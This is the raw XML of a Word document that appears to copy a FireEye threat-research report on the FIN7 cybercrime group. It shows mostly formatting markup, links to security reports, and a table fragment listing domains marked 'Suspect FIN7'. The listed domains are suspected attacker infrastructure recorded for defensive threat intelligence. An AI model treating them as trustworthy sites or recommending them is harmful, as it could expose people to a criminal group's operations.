              <w:t>newuniquesolutions.com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83E3DE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D98389"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r w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="30F6532C" w14:textId="77777777" w:rsidTr="009403EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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DBADD6"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wedogreatpurchases.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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A8C04F"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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E6812D" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
            <w:pPr>
              <w:spacing w:after="225"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Suspect FIN7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F446ACD" w14:textId="77777777" w:rsidR="00214751" w:rsidRDefault="009403EE"/>
    <w:sectPr w:rsidR="0021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2717"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B05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961C5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADF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CF4C4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1B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EE"/>
    <w:rsid w:val="00165D3B"/>
    <w:rsid w:val="007E4FFA"/>
    <w:rsid w:val="0094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DF80A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0824386-FC22-1E48-B007-699BFCF2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03E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403EE"/>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9403E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3E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403EE"/>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9403EE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009403EE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sep">
    <w:name w:val="sep"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009403EE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="by-author">
    <w:name w:val="by-author"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009403EE"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009403EE"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009403EE"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tagbutton">
    <w:name w:val="tagbutton"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009403EE"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009403EE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="type-xs">
    <w:name w:val="type-xs"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00940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7600">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1304653032">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1735543341">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5653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7581">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="237324504">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="711733201">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="965695369">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="864752216">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1609660709">
                      <w:marLeft w:val="-300"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="2130588997">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="115761422">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1362323717">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1291663459">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="2080983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77885490">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1665162892">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1653102080">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1253969129">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="4731342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975947">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="3871879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eye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/cap-barry-vengerik" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://casecurity.org/wp-content/uploads/2013/10/CASC-Code-Signing.pdf"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danielbohannon/Invoke-DOSfuscation" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/cap-steve-miller" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/fin7" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.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fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniqu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ireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/kimberly-goody" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/carbanak" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-authors/nick-carr" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/fbi" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research.html/category/etc/tags/fireeye-blog-tags/cyber-crime" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/search?q=%23FINdigestion" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoo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7616</Words>
  <Characters>43417</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>361</Lines>
  <Paragraphs>101</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>50932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 Miller</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Steven U. Miller</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-26T16:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-26T16:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>